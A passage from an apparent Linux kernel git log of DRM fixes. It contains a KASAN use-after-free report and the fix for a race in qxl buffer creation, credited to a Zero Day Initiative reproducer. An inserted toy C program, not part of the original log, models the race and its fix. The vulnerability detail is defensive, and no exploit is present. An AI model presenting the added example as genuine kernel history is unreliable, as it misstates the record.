      vfs_ioctl linux/fs/ioctl.c:51
      __do_sys_ioctl linux/fs/ioctl.c:870
      __se_sys_ioctl linux/fs/ioctl.c:856
      __x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
      do_syscall_x64 linux/arch/x86/entry/common.c:50
      do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
      
      The buggy address belongs to the object at ffff88801136c000
      which belongs to the cache kmalloc-1k of size 1024
      The buggy address is located 576 bytes inside of
      freed 1024-byte region [ffff88801136c000, ffff88801136c400)
      
      The buggy address belongs to the physical page:
      page:0000000089fc329b refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x11368
      head:0000000089fc329b order:3 entire_mapcount:0 nr_pages_mapped:0 pincount:0
      flags: 0xfffffc0010200(slab|head|node=0|zone=1|lastcpupid=0x1fffff)
      raw: 000fffffc0010200 ffff888007841dc0 dead000000000122 0000000000000000
      raw: 0000000000000000 0000000080100010 00000001ffffffff 0000000000000000
      page dumped because: kasan: bad access detected
      
      Memory state around the buggy address:
      ffff88801136c100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ffff88801136c180: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      >ffff88801136c200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ^
      ffff88801136c280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ffff88801136c300: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ==================================================================
      Disabling lock debugging due to kernel taint
      
      Instead of returning a weak reference to the qxl_bo object, return the
      created drm_gem_object and let the caller decrement the reference count
      when it no longer needs it. As a convenience, if the caller is not
      interested in the gobj object, it can pass NULL to the parameter and the
      reference counting is decremented internally.
      
      The bug and the reproducer were originally found by the Zero Day Initiative project (ZDI-CAN-20940).
      
      Link: https://www.zerodayinitiative.com/
      Signed-off-by: Wander Lairson Costa <wander@redhat.com>
      Cc: stable@vger.kernel.org
      Reviewed-by: Dave Airlie <airlied@redhat.com>
      Signed-off-by: Dave Airlie <airlied@redhat.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/20230814165119.90847-1-wander@redhat.com
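      Added example, not qxl or drm code: a toy reference-counted object with a per-file handle table that plays out the interleaving the reproducer above wins. The first variant returns a pointer kept alive only by the handle (the shape the commit describes as a weak reference); the second keeps one caller-owned reference, which is the fix's approach. All names (gem_create, handle_close, create_with_handle_weak, ...) are invented here, and "freed" is a flag standing in for the kfree() a real implementation would do.

```c
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>

/* Toy model of a reference-counted GEM-style object and a per-file handle
 * table. Constructed for this example; none of it is qxl or drm code. */
#define MAX_HANDLES 8

struct gem_object {
    int refcount;
    bool freed;        /* set when the last reference is dropped; a real
                        * implementation would kfree() the object here */
    int payload;
};

struct handle_table {
    struct gem_object *slots[MAX_HANDLES];
};

static void gem_get(struct gem_object *obj)
{
    obj->refcount++;
}

static void gem_put(struct gem_object *obj)
{
    if (--obj->refcount == 0)
        obj->freed = true;
}

/* New object with exactly one reference, owned by the creator. */
static struct gem_object *gem_create(int payload)
{
    struct gem_object *obj = calloc(1, sizeof(*obj));
    obj->refcount = 1;
    obj->payload = payload;
    return obj;
}

/* The handle table takes its own reference; returns the handle or -1. */
static int handle_create(struct handle_table *t, struct gem_object *obj)
{
    for (int i = 0; i < MAX_HANDLES; i++) {
        if (!t->slots[i]) {
            gem_get(obj);
            t->slots[i] = obj;
            return i;
        }
    }
    return -1;
}

/* What DRM_IOCTL_GEM_CLOSE does: drop the table's reference. */
static int handle_close(struct handle_table *t, int h)
{
    if (h < 0 || h >= MAX_HANDLES || !t->slots[h])
        return -1;
    gem_put(t->slots[h]);
    t->slots[h] = NULL;
    return 0;
}

/* Pre-fix shape: the creator's reference is dropped before returning, so the
 * returned pointer is only as alive as the handle. */
static struct gem_object *create_with_handle_weak(struct handle_table *t, int payload, int *handle)
{
    struct gem_object *obj = gem_create(payload);
    *handle = handle_create(t, obj);
    gem_put(obj);
    return obj;
}

/* Post-fix shape: the caller keeps one reference and must gem_put() it. */
static struct gem_object *create_with_handle(struct handle_table *t, int payload, int *handle)
{
    struct gem_object *obj = gem_create(payload);
    *handle = handle_create(t, obj);
    return obj;
}

/* The interleaving the reproducer wins: a second thread closes the handle
 * between creation and the creator's first use. Returns true if the creator
 * then touched an already-freed object. */
static bool dumb_create_old(void)
{
    struct handle_table t = {0};
    int h;
    struct gem_object *obj = create_with_handle_weak(&t, 42, &h);

    handle_close(&t, h);                 /* racing GEM_CLOSE from another thread */
    bool use_after_free = obj->freed;    /* the write in qxl_mode_dumb_create() lands here */
    free(obj);
    return use_after_free;
}

static bool dumb_create_fixed(void)
{
    struct handle_table t = {0};
    int h;
    struct gem_object *obj = create_with_handle(&t, 42, &h);

    handle_close(&t, h);                 /* same race, but we still hold a reference */
    bool use_after_free = obj->freed;
    gem_put(obj);                        /* creator done: refcount now reaches zero */
    free(obj);
    return use_after_free;
}

int main(void)
{
    printf("weak return value: %s\n", dumb_create_old() ? "use-after-free" : "ok");
    printf("caller-owned ref:  %s\n", dumb_create_fixed() ? "use-after-free" : "ok");
    return 0;
}
```

      The general rule the fix applies: a handle visible to user space is a reference user space can revoke at any moment, so code that keeps using the object after publishing the handle must hold a reference of its own.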
    • Merge tag 'amd-drm-fixes-6.5-2023-08-16' of... · 68c60b34
      Dave Airlie authored
      Merge tag 'amd-drm-fixes-6.5-2023-08-16' of https://gitlab.freedesktop.org/agd5f/linux into drm-fixes
      
      amd-drm-fixes-6.5-2023-08-16:
      
      amdgpu:
      - SMU 13.x fixes
      - Fix mcbp parameter for gfx9
      - SMU 11.x fixes
      - Temporary fix for large numbers of XCP partitions
      - S0ix fixes
      - DCN 2.0 fix
      Signed-off-by: Dave Airlie <airlied@redhat.com>
      
      From: Alex Deucher <alexander.deucher@amd.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/20230816200226.10771-1-alexander.deucher@amd.com
    • Merge tag 'drm-misc-fixes-2023-08-17' of git://anongit.freedesktop.org/drm/drm-misc into drm-fixes · be48306f
      Dave Airlie authored
      One EPROBE_DEFER handling fix for the JDI LT070ME05000, a timing fix for
      the AUO G121EAN01 panel, an integer overflow and a memory leak fixes for
      the qaic accel, a use-after-free fix for nouveau and a revert for an
      alleged fix in EDID parsing.
      Signed-off-by: Dave Airlie <airlied@redhat.com>
      
      From: Maxime Ripard <mripard@redhat.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/3olqt33em5uhxzjbqghwcwnvmw73h7bxkbdxookmnkecymd4vc@7ogm6gewpprq